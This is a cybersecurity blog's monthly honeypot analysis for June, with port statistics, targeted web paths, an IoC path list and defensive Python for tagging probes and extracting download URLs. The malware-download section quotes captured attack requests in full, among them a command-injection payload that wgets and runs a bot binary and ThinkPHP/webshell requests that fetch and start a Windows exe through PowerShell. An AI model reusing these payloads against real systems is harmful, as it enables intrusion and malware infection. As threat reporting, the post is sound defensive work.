sec-chick Blog

Cybersecurity blog

[Honeypot monthly analysis] Honeypot, June: traffic to VNC on the rise

This is the honeypot monthly analysis for June. I am also bringing Suricata online from next month, so next month I hope to include an analysis of that as well.

[Honeypot monthly analysis] Honeypot, June
◾️Honeytrap (excluding port 80)

<Detection count>

(image: daily detection-count graph)

The detection count on 6/9 was high; the cause was a large volume of RDP-oriented traffic sent to port 14791.
Payload:
Cookie: mstshash=Test

The majority of these sudden increases are traffic to RDP. I suspect they are detected periodically because the attacker's return is large if an RDP service turns out to be reachable from the outside.
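The point of the spike above is that the traffic to port 14791 was recognised as RDP by its payload (the X.224 connection request with its mstshash routing cookie), not by the port number. The following is an added example, not the blog author's tooling, of how a defender can tag Honeytrap-style records by protocol fingerprint and then flag an unusual day. The records, the X.224 request bytes and the "three times the median" spike rule are all constructed for the illustration.

```python
"""Port-independent protocol tagging plus a daily spike check for Honeytrap-style
records. Added illustration with constructed sample data, not the blog's own logs
or tooling."""
from collections import Counter
from statistics import median
from typing import Dict, Iterable, List, Optional, Tuple

Record = Tuple[str, int, bytes]   # (day, destination port, first payload bytes)

# An RDP X.224 Connection Request carries the routing cookie "Cookie: mstshash=<user>"
# after the 4-byte TPKT header and 7-byte X.224 header, whatever TCP port it arrives on.
TPKT_VERSION = b"\x03"
RDP_COOKIE = b"Cookie: mstshash="


def classify_payload(payload: bytes) -> str:
    """Tag a connection by what the client sent, not by the port it used."""
    if not payload:
        return "empty-probe"        # bare TCP connect: checking whether the port is open
    if payload.startswith(TPKT_VERSION) and RDP_COOKIE in payload:
        return "rdp"                # TPKT + X.224 CR with the mstshash routing cookie
    if payload.startswith(b"RFB "):
        return "vnc"                # RFB ProtocolVersion string
    return "other"


def rdp_cookie_value(payload: bytes) -> Optional[str]:
    """Return the user hint after mstshash= (the blog saw 'Test'), or None if absent."""
    start = payload.find(RDP_COOKIE)
    if start < 0:
        return None
    start += len(RDP_COOKIE)
    end = payload.find(b"\r\n", start)
    value = payload[start:] if end < 0 else payload[start:end]
    return value.decode("ascii", errors="replace")


def daily_counts(records: Iterable[Record], tag: Optional[str] = None) -> Dict[str, int]:
    """Detections per day, optionally restricted to one protocol tag."""
    counts: Counter = Counter()
    for day, _port, payload in records:
        if tag is None or classify_payload(payload) == tag:
            counts[day] += 1
    return dict(counts)


def spike_days(counts: Dict[str, int], factor: float = 3.0) -> List[str]:
    """Days whose count is at least `factor` times the median daily count (assumed rule)."""
    if not counts:
        return []
    baseline = median(counts.values())
    return sorted(day for day, n in counts.items() if n >= factor * baseline)


def ports_for_tag(records: Iterable[Record], tag: str) -> Dict[int, int]:
    """Destination ports that carried a given tag; shows RDP landing on non-3389 ports."""
    ports: Counter = Counter()
    for _day, port, payload in records:
        if classify_payload(payload) == tag:
            ports[port] += 1
    return dict(ports)


# Constructed X.224 Connection Request, laid out the way an mstsc-style client sends it.
RDP_CR = (
    b"\x03\x00\x00\x2a"                    # TPKT: version 3, reserved, length 42
    b"\x25\xe0\x00\x00\x00\x00\x00"        # X.224: LI=37, CR, dst-ref, src-ref, class 0
    + RDP_COOKIE + b"Test\r\n"             # routing cookie
    + b"\x01\x00\x08\x00\x03\x00\x00\x00"  # RDP_NEG_REQ asking for TLS/CredSSP
)

# Constructed three-day sample: a burst of RDP requests on port 14791 on the middle day.
SAMPLE: List[Record] = (
    [("2019-06-08", 5900, b"")] * 3 + [("2019-06-08", 3389, RDP_CR)] * 2
    + [("2019-06-09", 14791, RDP_CR)] * 18 + [("2019-06-09", 5900, b"")] * 2
    + [("2019-06-10", 110, b"")] * 3 + [("2019-06-10", 3389, RDP_CR)]
)

if __name__ == "__main__":
    for day in spike_days(daily_counts(SAMPLE)):
        print(day, "spike; rdp by port:",
              ports_for_tag([r for r in SAMPLE if r[0] == day], "rdp"))
```

Tagging by payload is what lets the per-port tables later in the post say "Unknown service, but RDP" for ports like 14791 and 10630; the spike rule is deliberately simple and should be tuned against the 90-day baseline the post already tracks.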

 

<Detections by port, difference from previous month (Honeytrap)>

Port   Service   Count    Diff vs. previous month
5900   vnc       149714   128430
445    smb       106044   -903
23     telnet    42814    -4681
110    pop3      29107    28940
3389   rdp       8278     -28026
3306   mysql     6438     430
10630            6218     6215
25     smtp      3783     -1410
5432             3300     -21480
2323   telnet    2447     -1128

<Detections by port, difference from 90-day average (Honeytrap)>

Port   Service   Count    Diff vs. 90-day average
5900   vnc       149714   109398
445    smb       106044   633
23     telnet    42814    -8308
110    pop3      29107    27848
14791  Unknown   15851    15841
3389   rdp       8278     -6869
3306   mysql     6438     -3071
10630  Unknown   6218     6215
25     smtp      3783     1182
5432   Unknown   3300     -5132


Traffic to the VNC and POP3 ports had increased. Neither kind of traffic carried any payload to speak of; they were probes checking whether the port was open. For VNC, the detection count may have risen because of BlueKeep, the remote-access vulnerability.
The other ports whose service is listed as Unknown were attempts at unauthorized access to RDP.

<Malware downloads, by target>

Target                 Count
Realtek SDK            713
webshell               87
MVPower DVR            73
Huawei Home Device     71
Redis                  59
Android Debug Bridge   53
Weblogic               29
Linksys router         18
Apache Struts2         12
Elasticsearch          4
ZyXEL router           3
AVTECH                 1

Most detections were attempts to download Mirai and Gafgyt targeting the Realtek SDK. There were also a fair number of webshell and Redis detections.


◾️WoWHoneypot
<Detection count>

(image: daily detection-count graph)


<Detections by target, top 10>

target count
Tomcat 7362
WordPress 2138
- 848
FreePBX 732
IP camera 284
phpMyAdmin 167
Unauthorized Relay 137
Zabbix 42
ThinkPHP 15
.env file 14

Attempts at unauthorized access to the Tomcat console continued to be detected in large numbers. There were also attacks aimed at IP cameras, and attacks targeting IoT devices appear to be gradually increasing.

<Detected paths, top 10>

wow_path_research target CVE reference count
/manager/html Tomcat - - 7362
/wp-login.php WordPress - - 956
/ - - - 795
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 732
/tmpfs/auto.jpg IP camera - - 284
/xmlrpc.php WordPress - - 136
/wp5/wp-login.php WordPress - - 95
/wp2/wp-login.php WordPress - - 93
/forum/wp-login.php WordPress - - 90
/wp/wp-login.php WordPress - - 90

Among HTTP paths, unauthorized access to the Tomcat manager was detected noticeably more often than any other path. Beyond that, attacks targeting FreePBX and WordPress were detected frequently.

<Malware downloads>

MalwareDownload path payload count
hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]x86 /awstatstotals/awstatstotals.php GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close.. 1
hxxp://fid[.]hognoob[.]se/download[.]exe /public/hydra.php GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. 1
hxxp://fid[.]hognoob[.]se/download[.]exe /public/index.php GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid[.]hognoob[.]se/download[.]exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. 1

hydra.php and index.php are webshells planted by earlier attacks; where such a webshell has been installed, the malware is downloaded through it. Since the file extension is .exe, the targeted OS is Windows.
https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369
https://sec-owl.hatenablog.com/entry/2019/01/17/014528
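As an added example (not the blog's or WoWHoneypot's code): pulling the download URL, the local drop path and the likely target platform out of captured requests like the three above, and defanging the result the way the table does. The sample requests use RFC 2606 example hosts rather than the post's indicators, and the extension-to-platform mapping is an assumption; it also covers the .mips/.mpsl/.sh file names that appear in the Honeytrap download table later in the post.

```python
"""Extract malware-download URLs from captured web-honeypot requests and defang them
for an IoC table. Added illustration; the requests and hosts are constructed (RFC 2606
example domains), not the blog's data, and the extension-to-platform map is an assumption."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# PowerShell WebClient downloader: DownloadFile('<url>','<local path>')
PS_DOWNLOAD_RE = re.compile(
    r"Download(?:File|String)\(\s*['\"](?P<url>https?://[^'\"]+)['\"]"
    r"(?:\s*,\s*['\"](?P<dst>[^'\"]+)['\"])?",
    re.IGNORECASE,
)
# Unix fetch chain: wget/curl [flags] <url>
UNIX_FETCH_RE = re.compile(
    r"\b(?:wget|curl)\s+(?:-[A-Za-z-]+\s+)*(?P<url>https?://[^\s;'\"|&)]+)",
    re.IGNORECASE,
)

# File-name suffix -> platform the dropped payload targets (assumed mapping)
PLATFORM_BY_EXT: Dict[str, str] = {
    "exe": "windows", "dll": "windows", "ps1": "windows",
    "sh": "linux-shell", "mips": "linux-mips", "mpsl": "linux-mipsel",
    "arm7": "linux-arm", "x86": "linux-x86",
}


def defang(url: str) -> str:
    """hxxp:// and [.] so the indicator cannot be followed by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def platform_of(url: str) -> str:
    """Guess the target platform from the final path component's suffix."""
    name = url.rstrip("/").rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return PLATFORM_BY_EXT.get(ext, "unknown")


def extract_downloads(raw_request: str) -> List[Dict[str, Optional[str]]]:
    """Return one IoC row per distinct download URL found in a captured request.

    The request is URL-decoded first because the command usually rides in the query
    string; the Referer header often repeats the same command, so rows are deduplicated."""
    decoded = unquote(raw_request)
    rows: List[Dict[str, Optional[str]]] = []
    seen = set()
    for m in PS_DOWNLOAD_RE.finditer(decoded):
        if m.group("url") not in seen:
            seen.add(m.group("url"))
            rows.append({"url": defang(m.group("url")),
                         "platform": platform_of(m.group("url")),
                         "drop_path": m.group("dst")})
    for m in UNIX_FETCH_RE.finditer(decoded):
        if m.group("url") not in seen:
            seen.add(m.group("url"))
            rows.append({"url": defang(m.group("url")),
                         "platform": platform_of(m.group("url")),
                         "drop_path": None})
    return rows


def ioc_table(requests: List[str]) -> List[Dict[str, Optional[str]]]:
    """Flatten many requests into one table, keeping the first occurrence of each URL."""
    table: List[Dict[str, Optional[str]]] = []
    seen = set()
    for req in requests:
        for row in extract_downloads(req):
            if row["url"] not in seen:
                seen.add(row["url"])
                table.append(row)
    return table


# Constructed captures in the same shape as WoWHoneypot output (request line, then
# headers joined with '.'); hosts are example domains.
SAMPLE_REQUESTS = [
    "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)"
    ".DownloadFile('http://dropper.example/download.exe','%SystemRoot%/Temp/abc123.exe');"
    "start%20%SystemRoot%/Temp/abc123.exe HTTP/1.1.Referer: http://honeypot.example:80/public/"
    "hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile("
    "'http://dropper.example/download.exe','%SystemRoot%/Temp/abc123.exe').Host: honeypot.example..",
    "GET /awstatstotals/awstatstotals.php?sort=].passthru('cd%20/tmp;%20wget%20"
    "http://dropper.example/bins/bot.x86;%20chmod%20777%20bot.x86;%20./bot.x86').exit().$a[ HTTP/1.1..",
]

if __name__ == "__main__":
    for row in ioc_table(SAMPLE_REQUESTS):
        print(row)
```

The two regexes cover the download primitives visible in the captures (PowerShell WebClient and wget); a real pipeline would add curl, busybox and tftp variants and feed the defanged rows straight into the month's IoC table.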

<IoC information>
WoWHoneypot

path target CVE reference
/ - - -
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743
/siteblog/wp-login.php WordPress - -
/myblog/wp-login.php WordPress - -
/forum1/wp-login.php WordPress - -
/WordPress9/wp-login.php WordPress - -
/WordPress8/wp-login.php WordPress - -
/WordPress7/wp-login.php WordPress - -
/WordPress6/wp-login.php WordPress - -
/WordPress4/wp-login.php WordPress - -
/WordPress3/wp-login.php WordPress - -
/WordPress2/wp-login.php WordPress - -
/WordPress1/wp-login.php WordPress - -
/wp8/wp-login.php WordPress - -
/wp7/wp-login.php WordPress - -
/wp5/wp-login.php WordPress - -
/wp4/wp-login.php WordPress - -
/wp3/wp-login.php WordPress - -
/test/wp-login.php WordPress - -
/wp1/wp-login.php WordPress - -
/site/wp-login.php WordPress - -
/blog/wp-login.php WordPress - -
/forum/wp-login.php WordPress - -
/WordPress/wp-login.php WordPress - -
/wp/wp-login.php WordPress - -
/wp-login.php WordPress - -
/favicon.ico - - -
/wp2/wp-login.php WordPress - -
hxxp://110[.]249[.]212[.]46/testget Unauthorized Relay - -
/TP/public/index.php ThinkPHP - -
/robots.txt - - -
///wp-json/wp/v2/users/ WordPress - -
/// - - -
/Temporary_Listen_Addresses/WSMAN Microsoft SharePoint  CVE-2019-0604 https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
hxxp://172[.]247[.]32[.]25/ddd[.]html Unauthorized Relay - -
/PMA/scripts/setup.php phpMyAdmin - -
/~riba/pma/scripts/setup.php phpMyAdmin - -
/alt/sqladmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin-2.8.0.4/scripts/setup.php phpMyAdmin - -
/pyaniste/mysqladmin/scripts/setup.php phpMyAdmin - -
/admincooptel/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/phpmyadmin.box25/scripts/setup.php phpMyAdmin - -
/phpmy/scripts/setup.php\ phpMyAdmin - -
/phpMyAdmin-www072510/scripts/setup.php phpMyAdmin - -
/phpmy/scripts/setup.php phpMyAdmin - -
/phpmyadmin/scripts/setup.php/index.php phpMyAdmin - -
/php/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/admin/scripts/setup.php phpMyAdmin - -
/php/scripts/setup.php phpMyAdmin - -
/php-my-admin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin2/scripts/setup.php phpMyAdmin - -
/sqladmin/scripts/setup.php phpMyAdmin - -
/db/scripts/setup.php phpMyAdmin - -
/websql/scripts/setup.php phpMyAdmin - -
/admin/phpmyadmin/scripts/setup.php phpMyAdmin - -
/_phpMyAdmin/scripts/setup.php phpMyAdmin - -
/configuracion/phpmyadmin/scripts/setup.php phpMyAdmin - -
/web/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/pHpMyAdMiN/scripts/setup.php phpMyAdmin - -
/MySQL/scripts/setup.php phpMyAdmin - -
/mysqladmin/scripts/setup.php phpMyAdmin - -
/scripts/setup.php phpMyAdmin - -
/MyAdmin/scripts/setup.php phpMyAdmin - -
/w00tw00t.at.blackhats.romanian.anti-sec:) phpMyAdmin - -
/epgrec/do-record.sh epgrec - http://www.mda.or.jp/epgrec/index.php/epgrec%E3%81%AE%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB%E3%81%A8%E8%A8%AD%E5%AE%9A
/foltia/ foltia ANIME LOCKER - https://sec-owl.hatenablog.com/entry/2018/08/01/004310
/_async/AsyncResponseService Oracle WebLogic Server CVE-2019-2725 https://www.secure-sketch.com/blog/verify-oracle-weblogic-vulnerability
/.git/config git - -
/siteblog//wp-json/wp/v2/users/ WordPress - -
/siteblog// WordPress - -
/myblog//wp-json/wp/v2/users/ WordPress - -
/myblog// WordPress - -
/forum1//wp-json/wp/v2/users/ WordPress - -
/forum1// WordPress - -
/WordPress9//wp-json/wp/v2/users/ WordPress - -
/WordPress9// WordPress - -
/WordPress8//wp-json/wp/v2/users/ WordPress - -
/WordPress8// WordPress - -
/WordPress7//wp-json/wp/v2/users/ WordPress - -
/WordPress7// WordPress - -
/WordPress6//wp-json/wp/v2/users/ WordPress - -
/WordPress6// WordPress - -
/WordPress5//wp-json/wp/v2/users/ WordPress - -
/WordPress5// WordPress - -
/WordPress5/wp-login.php WordPress - -
/WordPress4//wp-json/wp/v2/users/ WordPress - -
/WordPress4// WordPress - -
/WordPress3//wp-json/wp/v2/users/ WordPress - -
/WordPress3// WordPress - -
/WordPress2//wp-json/wp/v2/users/ WordPress - -
/WordPress2// WordPress - -
/WordPress1//wp-json/wp/v2/users/ WordPress - -
/WordPress1// WordPress - -
/wp8//wp-json/wp/v2/users/ WordPress - -
/wp8// WordPress - -
/wp7//wp-json/wp/v2/users/ WordPress - -
/wp7// WordPress - -
/wp5//wp-json/wp/v2/users/ WordPress - -
/wp5// WordPress - -
/wp4//wp-json/wp/v2/users/ WordPress - -
/wp4// WordPress - -
/wp3//wp-json/wp/v2/users/ WordPress - -
/wp3// WordPress - -
/wp2//wp-json/wp/v2/users/ WordPress - -
/wp2// WordPress - -
/downloader/ - - -
/wp1//wp-json/wp/v2/users/ WordPress - -
/wp1// WordPress - -
/site//wp-json/wp/v2/users/ WordPress - -
/site// WordPress - -
/test//wp-json/wp/v2/users/ WordPress - -
/test// WordPress - -
/blog//wp-json/wp/v2/users WordPress - -
/blog//wp-json/wp/v2/users/ WordPress - -
/blog// WordPress - -
/forum//wp-json/wp/v2/users/ WordPress - -
/forum// WordPress - -
/WordPress//wp-json/wp/v2/users/ WordPress - -
/WordPress// WordPress - -
/wp//wp-json/wp/v2/users/ WordPress - -
/wp// WordPress - -
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized Relay - -
/Temporary_Listen_Addresses/SMSSERVICE Microsoft SharePoint  CVE-2019-0604 https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
/manager/html Tomcat - -
/app/.env .env file - -
/phpmyadmin/index.php phpMyAdmin - -
/index.php - - -
/HNAP1 D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981
/evox/about Trane Tracer SC - https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327
/Nmap/folder/check1558950064 Nmap - -
/NmapUpperCheck1558950064 Nmap - -
/sdk Vmware - https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse
/nmaplowercheck1558950064 Nmap - -
/Nmap/folder/check1558937902 Nmap - -
/NmapUpperCheck1558937902 Nmap - -
/nmaplowercheck1558937902 Nmap - -
/_search Elasticsearch CVE-2015-1427 https://www.morihi-soc.net/?p=442
/autodiscover Zimbra  - https://www.exploit-db.com/exploits/46967
/HNAP1/ D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981
/.git/HEAD git - -
/ipc$ IPC - https://thinline196.hatenablog.com/entry/2018/09/23/153019
/webdav/ WebDAV - -
hxxp://www[.]baidu[.]com/ Unauthorized Relay - -
www.baidu.com:443 Unauthorized Relay - -
hxxp://www[.]123cha[.]com/ Unauthorized Relay - -
cn.bing.com:443 Unauthorized Relay - -
hxxp://www[.]ip[.]cn/ Unauthorized Relay - -
hxxp://123[.]125[.]114[.]144/ Unauthorized Relay - -
/tmpfs/auto.jpg IP camera - -
/admin/config.php Admin config - -
hxxp://112[.]35[.]53[.]83:8088/index[.]php Unauthorized Relay - -
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized Relay - -
/queryUserList Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC}  - https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
/web/cgi-bin/hi3510/param.cgi Zivif Web CVE-2017-17106 https://sec-owl.hatenablog.com/entry/2018/09/24/011848
/system.ini Microsoft Windows  3.1 System - https://www.weblio.jp/content/system.ini
/device.rsp TBK Vision DVR  CVE-2018-9995 https://windabaft.co.jp/blog_ceo/?p=458
/System/configurationFile/ Hikvision IP camera - https://mogu2itachi.hatenablog.com/entry/2019/04/07/065650
/RPC2_Login dahua camera - https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d
/\cgi-bin/login.cgi CGI - -
/\cgi-bin/get_status.cgi /\cgi-bin/get_status.cgi - -
/scripts/setup.php/index.php phpMyAdmin - -
/PHPMYADMIN/scripts/setup.ph phpMyAdmin - -
/phpMyAdmin/setup.php/index.php phpMyAdmin - -
/phpmyadmin/setup.php phpMyAdmin - -
/.env .env file - -
//blog/ WordPress - -
/acadmin.php Webshell - -
/current_config/passwd dahua camera - https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
/cgi-bin/user/Config.cgi AVTECH AVN801 DVR CVE-2013-4981 https://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-006100.html
/device_description.xml UPnP - https://medium.com/@djboris/digging-into-upnp-by-searching-a-sonos-api-5e10e080a232
/login.html login Page - -
/winbox.png MikroTik - https://sec-owl.hatenablog.com/entry/2018/10/12/160525
/currentsetting.htm NETGEAR Genie - https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/qnfxcjqr Webshell - -
/fdsrwe Webshell - -
/images/logo.gif - - -
/home.asp ASP - -
/tmpfs/snap.jpg IP camera - https://www.ispyconnect.com/man.aspx?n=IPCMontor
/phpmyadmin/ phpMyAdmin - -
/sitemap.xml xml sitemap - -
/login.cgi login Page - -
/.well-known/security.txt SSL certificate - https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/mysql/admin/index.php phpMyAdmin - -
/redirect.php PHP - -
//about.php PHP - -
//admin/config.php Admin config - -
//recordings/ FreePBX - https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//a2billing/customer/templates/default/footer.tpl FreePBX - https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//vtigercrm/vtigerservice.php vtiger vtiger CRM 5.2.1 - https://www.securityfocus.com/bid/47267/info
hxxp://160[.]16[.]145[.]183/ Unauthorized Relay - -
/wp-admin/ WordPress - -
/admin.php WordPress - https://nskw-style.com/2014/diary/visualize-wp-admin-flow.html
/ccvv Unknown - -
/index.do Apache Struts2 CVE-2017-5638 https://www.morihi-soc.net/?p=654
/index.action Apache Struts2 CVE-2017-5638 https://github.com/mazen160/struts-pwn
/struts2-rest-showcase/orders.xhtml Apache Struts2 CVE-2017-5638 https://blue-blue.hatenablog.com/entry/2017/03/12/212730
/server-status Apache Server - https://github.com/mazen160/server-status_PWN
/developer/.env .env file - -
/public/.env .env file - -
/backup/.env .env file - -
/portal/.env .env file - -
/api/.env .env file - -
/mobile/.env .env file - -
/dev/.env .env file - -
/m/.env .env file - -
/admin/.env .env file - -
/web/.env .env file - -
/phpmyadmin phpMyAdmin - -
/qzone/ - - -
xui.ptlogin2.qq.com:443 Unauthorized Relay - -
/console/login/LoginForm.jsp Oracle WebLogic Server CVE-2015-4852 https://www.exploit-db.com/exploits/46628
hxxp://check[.]proxyradar[.]com/azenv[.]php Unauthorized Relay - -
/usr/share/phpmyadmin/libraries/select_lang.lib.php phpMyAdmin - -
/phpMyAdmin/scripts/db___.init.php phpMyAdmin - -
/phpMyAdmin-2.11.1-all-languages/scripts/setup.php phpMyAdmin - -
/sqladm/scripts/setup.php phpMyAdmin - -
/setup.php PHP - -
/pma2012/ phpMyAdmin - -
/pma2011/ phpMyAdmin - -
/phpadmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin-2.5.5/scripts/setup.php phpMyAdmin - -
/dbadmin/scripts/setup.php phpMyAdmin - -
/jmx-console/ Jboss CVE-2010-0738 https://www.rapid7.com/db/modules/exploit/multi/http/jboss_maindeployer
* - - -
/shop/wp-includes/wlwmanifest.xml WordPress - -
/wp-includes/wlwmanifest.xml WordPress - -
/website/wp-includes/wlwmanifest.xml WordPress - -
/cms/wp-includes/wlwmanifest.xml WordPress - -
/wp/wp-includes/wlwmanifest.xml WordPress - -
/site/wp-includes/wlwmanifest.xml WordPress - -
/dev/wp-includes/wlwmanifest.xml WordPress - -
/wwww/wp-includes/wlwmanifest.xml WordPress - -
/web/wp-includes/wlwmanifest.xml WordPress - -
/WordPress/wp-includes/wlwmanifest.xml WordPress - -
/blog/wp-includes/wlwmanifest.xml WordPress - -
/2017/wp-login.php WordPress - -
/1/wp-login.php WordPress - -
/myforum/wp-login.php WordPress - -
/teststite/wp-login.php WordPress - -
/vlog/wp-login.php WordPress - -
/shop/wp-login.php WordPress - -
/nx8j78af1b.jsp Webshell - -
/blog2/wp-login.php WordPress - -
/upload/bank-icons/bank_16.png Unknown - -
/upload/bank-icons/bank-gh.jpg Unknown - -
hxxp://api[.]ipify[.]org/ Unauthorized Relay - -
hxxp://112[.]35[.]88[.]28:8088/index[.]php Unauthorized Relay - -
/3/wp-login.php WordPress - -
/backup/ - - -
/dbadmin/ phpMyAdmin - -
/myadmin/ phpMyAdmin - -
/pma/ phpMyAdmin - -
/admin/ - - -
/db/ - - -
/mysite/wp-login.php WordPress - -
/2/wp-login.php WordPress - -
/2018/wp-login.php WordPress - -
/news/wp-login.php WordPress - -
/blog3/wp-login.php WordPress - -
/2019/wp-login.php WordPress - -
/index_main.php Unknown - -
/warning.html Unknown - -
/xmlrpc.php WordPress - -
/user/login.html Unknown - -
hxxp://185[.]172[.]110[.]221:80/proxy_get[.]php Unauthorized Relay - -
/public/hydra.php Webshell - https://sec-owl.hatenablog.com/entry/2019/01/17/014528
/public/index.php - - -
/login - - -
/backup - - -
hxxp://112[.]35[.]66[.]7:8088/index[.]php Unauthorized Relay - -
hxxp://185[.]172[.]110[.]221/check[.]php Unauthorized Relay - -
/main.php - - -
/api_jsonrpc.php Zabbix - -
/zabbix/api_jsonrpc.php Zabbix - https://www.exploit-db.com/exploits/39937
//proxies.php Zabbix - -
/zabbix//proxies.php Zabbix - -
/zabbix/jsrpc.php Zabbix - -
/jsrpc.php Zabbix - -
/zabbix//httpmon.php Zabbix - -
//httpmon.php Zabbix - -
hxxp://112[.]35[.]63[.]31:8088/index[.]php Unauthorized Relay - -
/forum1/xmlrpc.php WordPress - -
/wp8/xmlrpc.php WordPress - -
/WordPress8/xmlrpc.php WordPress - -
/siteblog/xmlrpc.php WordPress - -
/myblog/xmlrpc.php WordPress - -
/WordPress9/xmlrpc.php WordPress - -
/WordPress3/xmlrpc.php WordPress - -
/WordPress6/xmlrpc.php WordPress - -
/wp7/xmlrpc.php WordPress - -
/WordPress1/xmlrpc.php WordPress - -
/wp5/xmlrpc.php WordPress - -
/test/xmlrpc.php WordPress - -
/wp4/xmlrpc.php WordPress - -
/wp3/xmlrpc.php WordPress - -
/wp1/xmlrpc.php WordPress - -
/site/xmlrpc.php WordPress - -
/wp2/xmlrpc.php WordPress - -
/forum/xmlrpc.php WordPress - -
/wp/xmlrpc.php WordPress - -
/WordPress/xmlrpc.php WordPress - -
/WordPress7/xmlrpc.php WordPress - -
/WordPress4/xmlrpc.php WordPress - -
/WordPress2/xmlrpc.php WordPress - -
/blog/xmlrpc.php WordPress - -
/moo Unknown - -
/html/.env .env file - -
/Nmap/folder/check1560131930 Nmap - -
/NmapUpperCheck1560131930 Nmap - -
/nmaplowercheck1560131930 Nmap - -
/shell Webshell - -
//MyAdmin/scripts/setup.php phpMyAdmin - -
//phpMyAdmin/scripts/setup.php phpMyAdmin - -
//pma/scripts/setup.php phpMyAdmin - -
/CFIDE/administrator/ Adobe ColdFusion - https://www.exploit-db.com/exploits/14641
/muieblackcat Scanner - https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/
/smartdomuspad/modules/reporting/track_import_export.php U.motion Builder  CVE-2018-7841 https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day/
/images/favicon.ico - - -
/scripts/ajaxPortal.lua VMware NSX SD-WAN Edge by VeloCloud CVE-2018-6961 https://www.exploit-db.com/exploits/44959
185.172.110.221:80 Unauthorized Relay - -
/awstatstotals/awstatstotals.php AWStats Totals CVE-2008-3922 https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html
/laravel/.env .env file - -
/.bitcoin/.env .env file - -
hxxp://10010[.]ah165[.]net:8088/hsp/out_of_service[.]jsp Unauthorized Relay - -
/index.html - - -
/Login.htm - - -
/PMA2005/ phpMyAdmin - -
/SQLite/main.php SQLiteManager - -
/SQLiteManager-1.2.4/main.php SQLiteManager - -
/SQLiteManager/main.php SQLiteManager - -
/agSearch/SQlite/main.php SQLiteManager - -
/hudson/script Unknown - -
/mysql-admin/ phpMyAdmin - -
/mysql/ phpMyAdmin - -
/mysqladmin/ phpMyAdmin - -
/mysqlmanager/ phpMyAdmin - -
